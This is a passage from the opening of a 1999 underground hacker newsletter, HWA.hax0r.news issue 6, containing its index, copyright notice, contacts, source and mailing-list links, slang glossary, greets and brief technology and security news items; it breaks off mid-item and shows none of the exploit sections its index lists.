home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / HWA-hn6.txt < prev    next >
Encoding:
Text File  |  1999-03-24  |  181.6 KB  |  4,018 lines

  1.     [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  2.   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  3.   ==========================================================================
  4.   =                     <=-[ HWA.hax0r.news ]-=>                           =
  5.   ==========================================================================
  6.     [=HWA'99=]                         Number 6 Volume 1 1999 Feb 13/14th 99
  7.   ==========================================================================
  8.  
  9.   
  10.    "You know its going to be one of those days when you wake up at 4am and
  11.     go into #insomniacs for some company but everyone else is asleep..." 
  12.                                         
  13.                                                          - VeXxation
  14.   
  15.    Synopsis
  16.    --------     
  17.    
  18.    The purpose of this newsletter is to 'digest' current events of interest
  19.    that affect the online underground and netizens in general. This includes
  20.    coverage of general security issues, hacks, exploits, underground news
  21.    and anything else I think is worthy of a look see.
  22.  
  23.     This list is NOT meant as a replacement for, nor to compete with, the
  24.    likes of publications such as CuD or PHRACK or with news sites such as
  25.    AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  26.    BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  27.  
  28.     It *is* intended  however, to  compliment such material and provide a
  29.    reference to those who follow the culture by keeping tabs on as many
  30.    sources as possible and providing links to further info, its a labour
  31.    of love and will be continued for as long as I feel like it, i'm not
  32.    motivated by dollars or the illusion of fame, did you ever notice how
  33.    the most famous/infamous hackers are the ones that get caught? there's
  34.    a lot to be said for remaining just outside the circle... <g>
  35.  
  36.  
  37.    @HWA
  38.    
  39.    ------------------------------------------------------------------------- 
  40.   
  41.                      Welcome to HWA.hax0r.news ... #6
  42.                      
  43.                          S P E C I A L  I S S U E                            
  44.                          
  45.                  tHe |<rAd sT. vA13nt1n3s DaY m4554cr3 1s5u3 
  46.                  
  47.                  
  48.    "...F.V? (Fantasy Violence) what about R.V? (Real Violence),  there are kids
  49.    shooting each other on the streets abd congress is worrying about the
  50.    coyote dropping an anvil on the roadrunner" 
  51.                                                 - FProphet'99              
  52.                      
  53.    ------------------------------------------------------------------------- 
  54.    
  55.   Issue #6 middle release, Feb 13th 1999                Yes you SHOULD worry.
  56.   
  57.    ------------------------------------------------------------------------- 
  58.   
  59.   'imapd THIS muthafuckaz' 
  60.  
  61.   _____/[ INDEX ]\___________________________________________________________         
  62.  
  63.     Key     Content
  64.   ---------------------------------------------------------------------------    
  65.   
  66.     0.0  .. COPYRIGHTS 
  67.     0.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
  68.     0.2  .. SOURCES        
  69.     0.3  .. THIS IS WHO WE ARE
  70.     0.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
  71.     0.5  .. THE HWA_FAQ V1.0 
  72.     
  73.  ----------------------------------------------------------------------------    
  74.     
  75.     1.0  .. Greets
  76.     1.1  .. Last minute stuff, rumours, newsbytes, mailbag
  77.     2.0  .. From the editor
  78.     3.0  .. The Future of Hacking by pH4RcYd3
  79.     3.1  .. Angelfire Flaws by pH4RcYd3
  80.     3.2  .. Some underground prose from Liquid Phire
  81.     4.0  .. Intercepted log from a private LoU irc conference courtesy of Ruffneck    
  82.     5.0  .. Microsoft security advisories
  83.     5.1  .. Sun security advisories
  84.     5.2  .. eYE security advisories
  85.     6.0  .. Arbitrary command execution using Pine
  86.     7.0  .. Hacking in Germany by Qubik
  87.     8.0  .. Spotlight on: Project Gamma by Qubik
  88.     9.0  .. Secret Cyber Sex; Gary, your secret is out!
  89.    10.0  .. So is Mr Lewis's Kidney! 
  90.    11.0  .. Free Email acct's full of security holes?
  91.    12.0  .. Quebec government's hacker challenge 
  92.    13.0  .. News from Tokyo from Wile
  93.       
  94.     A.0  .. APPENDICES  
  95.     A.1  .. PHACVW linx and references 
  96.  
  97.   ---------------------------------------------------------------------------
  98.   
  99.       The name Linus means "flaxen-haired" and is of Greek origin ...- Ed
  100.       
  101.       
  102.        "Shouting the loudest does not make you right or true" - FP
  103.  
  104.   ---------------------------------------------------------------------------      
  105.  
  106.      @HWA'99                 
  107.      
  108.      
  109.   
  110.          
  111.   0.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
  112.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  113.      
  114.      THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
  115.      OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
  116.      WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
  117.      (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
  118.      READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  119.      
  120.      Important semi-legalese and license to redistribute:
  121.      
  122.      YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF 
  123.      AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
  124.      ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED 
  125.      IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE 
  126.      APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
  127.      IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
  128.      ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
  129.      ME PRIVATELY current email cruciphux@dok.org 
  130.      
  131.      THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
  132.      WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
  133.      THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
  134.      
  135.      I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  136.      AND REDISTRIBUTE/MIRROR. - EoD
  137.    
  138.     
  139.      Although this file and all future issues are now copyright, some of
  140.     the content holds its  own copyright and these are printed and 
  141.     respected. News is news so i'll print any and all news but will quote 
  142.     sources when the source is known, if its good enough for CNN its good
  143.     enough for me. And i'm doing it for free on my own time so pfffft. :) 
  144.     
  145.     No monies are made or sought through the distribution of this material.
  146.     If you have a problem or concern email me and we'll discuss it.
  147.     
  148.     cruciphux@dok.org
  149.     
  150.     Cruciphux [C*:.]
  151.  
  152.       
  153.      
  154.   0.1  CONTACT INFORMATION AND MAIL DROP
  155.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  156.        
  157.        Has it occurred to anybody that "AOL for Dummies" is an extremely
  158.        redundant name for a book? 
  159.                                       - unknown
  160.        
  161.            
  162.      Wahoo, we now have a mail-drop, if you are outside of the U.S.A or 
  163.     Canada / North America (hell even if you are inside ..) and wish to
  164.     send printed matter like newspaper clippings a subscription to your
  165.     cool foreign hacking zine or photos, small non-explosive packages
  166.     or sensitive information etc etc well, now you can. (w00t) please
  167.     no more inflatable sheep or plastic dog droppings, or fake vomit
  168.     thanks.
  169.     
  170.     Send all goodies to:
  171.     
  172.         HWA NEWS
  173.         P.O BOX 44118
  174.         370 MAIN ST. NORTH
  175.         BRAMPTON, ONTARIO
  176.         CANADA
  177.         L6V 4H5
  178.         
  179.     Ideas for interesting 'stuff' to send in apart from news:
  180.     
  181.     - Photo copies of old system manual front pages (optionally signed by you) ;-)
  182.     - Photos of yourself, your mom, sister, dog and or cat in a NON
  183.       compromising position plz I don't want pr0n. <g>
  184.     - Picture postcards
  185.     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  186.       tapes with hack/security related archives, logs, irc logs etc on em.
  187.     - audio or video cassettes of yourself/others etc of interesting phone
  188.       fun or social engineering examples or transcripts thereof.
  189.     
  190.     If you still can't think of anything you're probably not that interesting
  191.     a person after all so don't worry about it <BeG>  
  192.     
  193.     Our current email:
  194.     
  195.     Submissions/zine gossip.....: hwa@press.usmc.net
  196.     Private email to editor.....: cruciphux@dok.org
  197.     Distribution/Website........: sas72@usa.net
  198.  
  199.     @HWA
  200.  
  201.            
  202.     
  203.   0.2  Sources ***
  204.        ~~~~~~~~~~~     
  205.  
  206.      Sources can be some, all, or none of the following (by no means complete
  207.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  208.     from lists or news from other sites, articles and information is compiled
  209.     and or sourced by Cruciphux no copyright claimed.
  210.  
  211.     HiR:Hackers Information Report... http://axon.jccc.net/hir/
  212.     News & I/O zine ................. http://www.antionline.com/
  213.    *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
  214.     News (New site unconfirmed).......http://cnewz98.hypermart.net/
  215.     Back Orifice/cDc..................http://www.cultdeadcow.com/
  216.     News site (HNN) .....,............http://www.hackernews.com/
  217.     Help Net Security.................http://net-security.org/  
  218.     News,Advisories,++ ...............http://www.l0pht.com/
  219.     NewsTrolls (HNN)..................http://www.newstrolls.com/
  220.     News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  221.     CuD ..............................http://www.soci.niu.edu/~cudigest
  222.     News site+........................http://www.zdnet.com/
  223.  
  224.     +Various mailing lists and some newsgroups, such as ...
  225.     +other sites available on the HNN affiliates page, please see
  226.      http://www.hackernews.com/affiliates.html as they seem to be popping up
  227.      rather frequently ...
  228.  
  229.     * Yes demoniz is now officially retired, if you go to that site though the
  230.      Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
  231.      also be hosting a webboard as soon as that site comes online perhaps you can
  232.      visit it and check us out if I can get some decent wwwboard code running I
  233.      don't really want to write my own, another alternative being considered is a
  234.      telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
  235.     
  236.     http://www.the-project.org/ .. IRC list/admin archives
  237.     http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  238.     
  239.     alt.hackers.malicious
  240.     alt.hackers
  241.     alt.2600
  242.     BUGTRAQ
  243.     ISN security mailing list
  244.     ntbugtraq
  245.     <+others>
  246.  
  247.     NEWS Agencies, News search engines etc:
  248.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  249.     http://www.cnn.com/SEARCH/
  250.     http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
  251.     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
  252.     http://www.ottawacitizen.com/business/
  253.     http://search.yahoo.com.sg/search/news_sg?p=cracker
  254.     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
  255.     http://www.zdnet.com/zdtv/cybercrime/
  256.     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
  257.  
  258.     NOTE: See appendices for details on other links.
  259.     
  260.     Referenced news links
  261.     ~~~~~~~~~~~~~~~~~~~~~
  262.        
  263.     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  264.     http://freespeech.org/eua/ Electronic Underground Affiliation
  265.     http://www.l0pht.com/cyberul.html     
  266.     http://www.hackernews.com/archive.html?122998.html
  267.     http://ech0.cjb.net ech0 Security
  268.     http://net-security.org Net Security  
  269.  
  270.     ...
  271.     
  272.     
  273.     Submissions/Hints/Tips/Etc
  274.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  275.     All submissions that are `published' are printed with the credits
  276.     you provide, if no response is received by a week or two it is assumed
  277.     that you don't care wether the article/email is to be used in an issue
  278.     or not and may be used at my discretion.
  279.     
  280.     Looking for:
  281.     
  282.     Good news sites that are not already listed here OR on the HNN affiliates
  283.     page at http://www.hackernews.com/affiliates.html
  284.     
  285.     Magazines (complete or just the articles) of breaking sekurity or hacker
  286.     activity in your region, this includes telephone phraud and any other
  287.     technological use, abuse hole or cool thingy. ;-) cut em out and send it
  288.     to the drop box.
  289.     
  290.     
  291.     - Ed
  292.     
  293.     Mailing List Subscription Info   (Far from complete)         Feb 1999
  294.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~    
  295.         
  296.     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
  297.     
  298.     
  299.     THE MOST READ:
  300.     
  301.     BUGTRAQ - Subscription info
  302.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  303.     
  304.     What is Bugtraq?     
  305.  
  306.     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  307.     file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to 
  308.     bugtraq, send mail to listserv@netspace.org containing the message body
  309.     subscribe bugtraq. I've been archiving this list on the web since late 
  310.     1993. It is searchable with glimpse and archived on-the-fly with hypermail.
  311.     
  312.     Searchable Hypermail Index;
  313.          
  314.           http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
  315.     
  316.     
  317.         
  318.     About the Bugtraq mailing list
  319.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  320.     
  321.     The following comes from Bugtraq's info file: 
  322.  
  323.     This list is for *detailed* discussion of UNIX security holes: what they are,
  324.     how to exploit, and what to do to fix them. 
  325.  
  326.     This list is not intended to be about cracking systems or exploiting their 
  327.     vulnerabilities. It is about defining, recognizing, and preventing use of 
  328.     security holes and risks. 
  329.  
  330.     Please refrain from posting one-line messages or messages that do not contain
  331.     any substance that can relate to this list`s charter. 
  332.  
  333.     I will allow certain informational posts regarding updates to security tools,
  334.     documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
  335.     on this list. 
  336.  
  337.     Please follow the below guidelines on what kind of information should be posted
  338.     to the Bugtraq list: 
  339.  
  340.     + Information on Unix related security holes/backdoors (past and present) 
  341.     + Exploit programs, scripts or detailed processes about the above 
  342.     + Patches, workarounds, fixes 
  343.     + Announcements, advisories or warnings 
  344.     + Ideas, future plans or current works dealing with Unix security 
  345.     + Information material regarding vendor contacts and procedures 
  346.     + Individual experiences in dealing with above vendors or security organizations 
  347.     + Incident advisories or informational reporting 
  348.  
  349.     Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
  350.     reflector address if the response does not meet the above criteria. 
  351.  
  352.     Remember: YOYOW. 
  353.  
  354.     You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
  355.     those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. 
  356.  
  357.     For questions or comments, please mail me: 
  358.     chasin@crimelab.com (Scott Chasin) 
  359.  
  360.     
  361.     BEST-OF-SECURITY Subscription Info.
  362.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  363.            
  364.     
  365.                     _/_/_/          _/_/          _/_/_/
  366.                    _/    _/      _/    _/      _/
  367.                   _/_/_/        _/    _/        _/_/
  368.                  _/    _/      _/    _/            _/
  369.                 _/_/_/          _/_/        _/_/_/
  370.  
  371.                 Best            Of          Security
  372.  
  373.     "echo subscribe|mail best-of-security-request@suburbia.net"
  374.  
  375.                                 or
  376.  
  377.     "echo subscribe|mail best-of-security-request-d@suburbia.net"
  378.  
  379.                           (weekly digest)
  380.  
  381.     For those of you that just don't get the above, try sending a message to
  382.     best-of-security-request@suburbia.net with a subject and body of subscribe
  383.     and you will get added to the list (maybe, if the admin likes your email).  
  384.  
  385.  
  386.     @HWA
  387.     
  388.      
  389.   0.3  THIS IS WHO WE ARE 
  390.        ~~~~~~~~~~~~~~~~~~
  391.       
  392.       'A "thug" was once the name for a ritual strangler, and is taken from
  393.        the Hindu word Thag... ' - Ed
  394.       
  395.       
  396.       Some HWA members and Legacy staff
  397.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    
  398.       cruciphux@dok.org.........: currently active/editorial
  399.       darkshadez@ThePentagon.com: currently active/man in black
  400.       fprophet@dok.org..........: currently active/IRC+ man in black
  401.       sas72@usa.net ............. currently active/IRC+ distribution
  402.       vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  403.       dicentra...(email withheld): IRC+ grrl in black
  404.       
  405.       
  406.       Foreign Correspondants/affiliate members
  407.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  408.       ATTENTION: All foreign correspondants please check in or be removed by next
  409.       issue  I need  your current emails since contact info was recently lost in a 
  410.       HD mishap and i'm not carrying any deadweight. Plus we need more people sending
  411.       in info, my apologies for not getting back to you if you sent in January I lost
  412.       it, please resend. 
  413.       
  414.       
  415.                
  416.        N0Portz ..........................: Australia      
  417.        Qubik ............................: United Kingdom 
  418.        system error .....................: Indonesia      
  419.        Wile (wile coyote) ...............: Japan/the East 
  420.        Ruffneck  ........................: Netherlands/Holland
  421.        
  422.        And unofficially yet contributing too much to ignore ;)
  423.        
  424.        Spikeman .........................: World media 
  425.        
  426.        Please send in your sites for inclusion here if you haven't already
  427.        also if you want your emails listed send me a note ... - Ed
  428.        
  429.       http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
  430.         
  431.        
  432.      Contributors to this issue:
  433.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  434.        liquid phire......................: underground prose
  435.        pH4RcYd3 .........................: The Future of Hacking+       
  436.        Qubik ............................: Hacking in Germany+     
  437.        Ruffneck .........................: LoU irc log+
  438.        Spikeman .........................: daily news updates+       
  439.        Wile .............................: News from Tokyo
  440.        
  441.        
  442.        
  443.        
  444.     :-p  
  445.     
  446.     
  447.     1. We do NOT work for the government in any shape or form.
  448.      
  449.     2. Unchanged since issue #1,
  450.         
  451.     
  452.     @HWA
  453.     
  454.     
  455.  
  456.   0.4  Whats in a name? why HWA.hax0r.news??
  457.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  458.      
  459.       Well what does HWA stand for? never mind if you ever find out I may
  460.      have to get those hax0rs from 'Hackers' or the Pretorians after you.
  461.      
  462.      In case you couldn't figure it out hax0r is "new skewl" and although
  463.      it is laughed at, shunned, or even pidgeon holed with those 'dumb
  464.      leet (l33t?) dewds' <see article in issue #4> this is the state
  465.      of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you 
  466.      up  and comers, i'd highly recommend you get that book. Its almost 
  467.      like  buying a clue. Anyway..on with the show .. - Editorial staff
  468.      
  469.  
  470.    
  471.  
  472.   0.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated)
  473.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  474.        
  475.     Also released in issue #3. (unchanged) check that issue for the faq
  476.     it won't be reprinted unless changed in a big way with the exception
  477.     of the following excerpt from the FAQ, included to assist first time
  478.     readers:
  479.  
  480.     Some of the stuff related to personal useage and use in this zine are
  481.     listed below: Some are very useful, others attempt to deny the any possible
  482.     attempts at eschewing obfuscation by obsucuring their actual definitions.
  483.     
  484.     @HWA  - see EoA  ;-)
  485.     !=    - Mathematical notation "is not equal to" or "does not equal"
  486.             ASC(247)  "wavey equals" sign means "almost equal" to. If written
  487.             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
  488.             to or less than and =>  is equal to or greater than (etc, this aint 
  489.             fucking grade school, cripes, don't believe I just typed all that..)      
  490.     AAM   - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
  491.    *AOL   - A great deal of people that got ripped off for net access by a huge
  492.             clueless isp with sekurity that you can drive buses through, we're
  493.             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
  494.             least they could try leasing one??
  495.     CC    - Credit Card phraud
  496.     CCC   - Chaos Computer Club (Germany)               
  497.     EoC   - End of Commentary
  498.     EoA   - End of Article or more commonly @HWA
  499.     EoF   - End of file
  500.     EoD   - End of diatribe (AOL'ers: look it up)
  501.     FUD   - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
  502.             usually in general media articles not high brow articles such as ours or other
  503.             HNN affiliates ;)
  504.     HNN   - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html       
  505.     NFC   - Depends on context: No Further Comment or No Fucking Comment
  506.     NFR   - Network Flight Recorder (Do a websearch)
  507.     PHACV - And variations of same <coff> 
  508.            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
  509.           
  510.           Alternates: H - hacking, hacktivist
  511.                       C - Cracking <software>
  512.                       C - Cracking <systems hacking>
  513.                       V - Virus 
  514.                       W - Warfare <cyberwarfare usually as in Jihad>
  515.                       CT - Cyber Terrorism
  516.     TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
  517.     TBA - To Be Arranged/To Be Announced also 2ba
  518.     TFS - Tough fucking shit.
  519.     
  520.     
  521.         
  522.   1.0  Greets!?!?! yeah greets! w0w huh. - Ed
  523.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  524.      
  525.      Thanks to all in the community for their support and interest but i'd
  526.      like to see more reader input, help me out here, whats good, what sucks
  527.      etc, not that I guarantee i'll take any notice mind you, but send in 
  528.      your thoughts anyway.
  529.      
  530.      
  531.      Shouts to:
  532.  
  533.        * Kevin Mitnick       * demoniz          * The l0pht crew
  534.        * tattooman           * Dicentra         * Pyra          
  535.        * Vexxation           * FProphet         * TwistedP      
  536.        * NeMstah             * the readers
  537.      
  538.        * all the people who sent in cool emails and support
  539.        * our new 'staff' members.
  540.      
  541.   
  542.      kewl sites:
  543.      
  544.      + http://www.freshmeat.net/
  545.      + http://www.slashdot.org/
  546.      + http://www.l0pht.com/
  547.      + http://www.2600.com/
  548.      + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
  549.      + http://www.legions.org/
  550.      + http://www.genocide2600.com/      
  551.      + http://www.genocide2600.com/~spikeman/
  552.      + http://www.genocide2600.com/~tattooman/     
  553.      + http://www.hackernews.com/ (Went online same time we started issue 1!)          
  554.    
  555.      @HWA
  556.      
  557.  
  558.   1.1  Last minute stuff, rumours and newsbytes
  559.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  560.        
  561.        "What is popular isn't always right, and what is right isn't
  562.          always popular..." 
  563.                            - FProphet '99
  564.  
  565.     +++ When was the last time you backed up your important data?    
  566.     
  567.     ++  Check out http://c5.hakker.com/ kewl hostname, kewl host, i was bribed to
  568.         say this and its in German so I dunno if its great or not but check em
  569.         out anyways, webhosting, email forwarding etc etc ;) (Pages in German)
  570.     
  571.     ++  IS YOUR 'FREEMAIL' ACCOUNT FULL OF SECURITY HOLES?
  572.         Contributed by me, source: ZDNet news, see section 11 for the full article.
  573.         If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to
  574.         hackers. Ira Winkler investigates the security risks of free e-mail services.
  575.  
  576.         http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html
  577.     
  578.     ++ 15 YR OLD AND 18 YR OLD BUSTED FOR ATTEMPTED COMPUTER BREAKINS
  579.        (HNN/contributed by erehwon) Source: Washington Post
  580.      
  581.         Vienna Virginia police have arrested a 15 year old freshman for
  582.        breaking into the computers at Clemson University and
  583.        attempting to break into systems at NASA. The Vienna student
  584.        was arrested Feb. 1 on charges of felony computer trespass and
  585.        misdemeanor computer fraud. Authorities in South Carolina have
  586.        arrested Steven Ray McAlister, 18, of Pelzer, S.C., and charged
  587.        him with conspiracy to commit computer crime, naming the
  588.        Vienna youth as his co-conspirator.        
  589.     
  590.        http://search.washingtonpost.com/wp-srv/WPlate/1999-02/12/032l-021299-idx.html
  591.  
  592.     ++ Dallas Semi Debuts Single-Chip Temperature Data Logger
  593.        Contributed to HWA by Spikeman Source: techweb
  594.        
  595.        DS1615 Temperature Recorder integrates a Y2K-compatible
  596.        real-time clock, digital thermometer, nonvolatile memory, control
  597.        logic, and serial interface.
  598.        http://www.techweb.com/wire/story/TWB19990211S0008
  599.  
  600.  
  601.     ++ Where's Waldo? Maybe On The Edge Of A Chip
  602.        Contributed to HWA by Spikeman Source: techweb
  603.        
  604.        Designers have been putting their initials on chips for years, but
  605.        finer geometries open the possibility of more sophisticated images,
  606.        such as cartoon characters.
  607.        http://www.techweb.com/wire/story/TWB19990211S0001
  608.  
  609.  
  610.     ++ AT&T CEO: Scrap Phone-Access Charges
  611.        Contributed to HWA by Spikeman Source: techweb
  612.        
  613.        Dumping access charges means an end to universal service, a
  614.        decades-long tradition of low-cost phone service to rural areas.
  615.        http://www.techweb.com/wire/story/TWB19990210S0016
  616.  
  617.     ++ DOJ: Microsoft Feared Fair Competition
  618.        Contributed to HWA by Spikeman Source: techweb
  619.        
  620.        The government's lead attorney says Microsoft feared competing
  621.        with Netscape and relied on exclusionary contracts with ISPs.
  622.        http://www.techweb.com/wire/story/msftdoj/TWB19990210S0014
  623.  
  624.  
  625.  
  626.     ++ Gateway Looks To Serve Networked Homes
  627.        Contributed to HWA by Spikeman Source: techweb
  628.        
  629.        Gateway is designing a server to serve the networked home of the
  630.        future.
  631.        http://www.techweb.com/wire/story/TWB19990210S0017
  632.  
  633.     ++ MTV's Road Rules, a hacker haven?
  634.        Abe, some dork on Road Rules an MTV show was seen sporting an "official"
  635.        r00t hat... you mean just anyone can't make a hat with "r00t" on it? geez
  636.        anyway w00t to the r00t ... contributed by everyone and even discussed on
  637.        irc and dc-stuff ... (*sigh*) watch for the new HWA.hax0r.news t-shirts and
  638.        hats to come soon!!! =) (No offense to r00t intended, they rock harder than
  639.        MTV ever could - Ed ps. add me to the bots! ? whats the #Hack key? ;) <sic>
  640.  
  641.     ++ Online Freedom Of Information Sparks Fears
  642.        Contributed to HWA by Spikeman Source: techweb
  643.        
  644.        Requirement to publish disaster information about nation's chemical
  645.        plants may be road map for terrorists, lawmakers say.
  646.        http://www.techweb.com/wire/story/TWB19990210S0015
  647.  
  648.    
  649.      
  650.     ++ ONLINE PORN  VIGILANTE "A LIAR" (CULT. 9:20 am)    
  651.        Contributed to HWA by Spikeman Source: ZDNnet news
  652.          
  653.        http://www.wired.com/news/news/email/explode-infobeat/culture/story/17789.html
  654.        A former hacker made headlines all over the world when he declared war on
  655.        child pornographers. But his one-man campaign wasn't all it was cracked up
  656.        to be. By Steve Silberman.
  657.  
  658.     ++ FREE PCS -- WITH A CATCH (BUS. 7:28 am)
  659.        Contributed to HWA by Spikeman Source: ZDNet news
  660.         
  661.        http://www.wired.com/news/news/email/explode-infobeat/business/story/17783.html
  662.        A California start-up is offering Compaq computers to the
  663.        first 10,000 people to sign away their consumer privacy.
  664.  
  665.  
  666.  
  667.     ++ BT, MICROSOFT IN WIRELESS DEAL (BUS. 7:28 am)
  668.        Contributed to HWA by Spikeman Source: ZDNet news
  669.          
  670.        http://www.wired.com/news/news/email/explode-infobeat/business/story/17784.html
  671.  
  672.        The two companies reach an agreement to develop Internet and
  673.        corporate data services for mobile users.       
  674.  
  675.  
  676.     ++ CHINESE DISSIDENT APPEALS (POL. 7:28 am)
  677.        Contributed to HWA by Spikeman Source: ZDNet news
  678.        
  679.        http://www.wired.com/news/news/email/explode-infobeat/politics/story/17785.html
  680.       
  681.        A software engineer is fighting the two-year sentence that a Shanghai
  682.        court gave him for providing email addresses to US-based publications.
  683.  
  684.  
  685.  
  686.     ++ Early Y2K Suit Struck Down
  687.        Contributed to HWA by Spikeman Source: The Recorder
  688.         
  689.       " ...in California Intuit Inc. has won another round in the ongoing Y2K
  690.       litigation wars. A California judge has dismissed most of the case
  691.       against it in a combined class action suit, In re Intuit Inc. Year 2000
  692.       California Litigation. Plaintiffs had alleged that Intuit's Quicken
  693.       financial software is not Year 2000 compliant and that consumers had
  694.       already been damaged as a result. The judge threw out damages and fraud
  695.       claims, but said plaintiffs could amend their injunctive relief
  696.       complaint, which centers on the charge that Intuit engaged in unfair
  697.       business practices." (The Recorder) -- 
  698.       
  699.       For complete story, see;
  700.       
  701.       http://www.lawnewsnetwork.com/stories/feb/e020899k.html)
  702.         
  703.         
  704.         
  705.    ++ HACKER STEALS WOMAN'S PASSWORD, SENDS PORNO OFFER IN HER NAME - SF Gate 02/04/99
  706.       Contributed to HWA by Spikeman Source: SF Gate
  707.       
  708.       http://www.sfgate.com/cgi-bin/article.cgi?file=/news/archive/1999/02/04/state1338EST0026.DTL
  709.         
  710.       (02-04) 10:38 PST APTOS, Calif. (AP) -- A 70-year-old woman who used 
  711.       the Internet to learn about quilting and coins was targeted by a 
  712.       hacker who stole her password and used it to send 22,000 pornographic 
  713.       e-mails in her name.
  714.         
  715.       "Lucille Nordgren, a grandmother of five, thought America Online was a 
  716.        convenient way to follow her hobbies. She was still reeling on 
  717.        Thursday from the news her account was used to send electronic ads 
  718.        for a web site offering ``incest, fetishes, super young teens, wild 
  719.        orgies and bondage.''
  720.         
  721.         
  722.     ++ Web Site Won
  723.        Contributed to HWA by Spikeman
  724.         
  725.        The anti-abortion Web site the Nuremberg Files was thrown on the
  726.        defensive by last week's federal court jury verdict. Then, the site was
  727.        shut down Friday afternoon by its Internet service provider, MindSpring.
  728.        However, 54-year-old computer programmer Otis O'Neal "Neal" Horsley, is
  729.        searching for another ISP. The good news for Horsley is that the judge
  730.        in the Portland, Ore., case refused to grant an injunction closing down
  731.        the site. "If I go to jail over this, I take the First Amendment with
  732.        me," Horsley said. (Fulton County Daily Report -- For complete story,
  733.        see http://www.lawnewsnetwork.com/stories/feb/e020899h.html)
  734.         
  735.         
  736.     ++ Intel Trying to Oust FTC Lawyer
  737.        Contributed to HWA by Spikeman
  738.         
  739.       Intel is trying to bench the lead government counsel in the Federal
  740.       Trade Commission's antitrust case against the chip maker. Richard
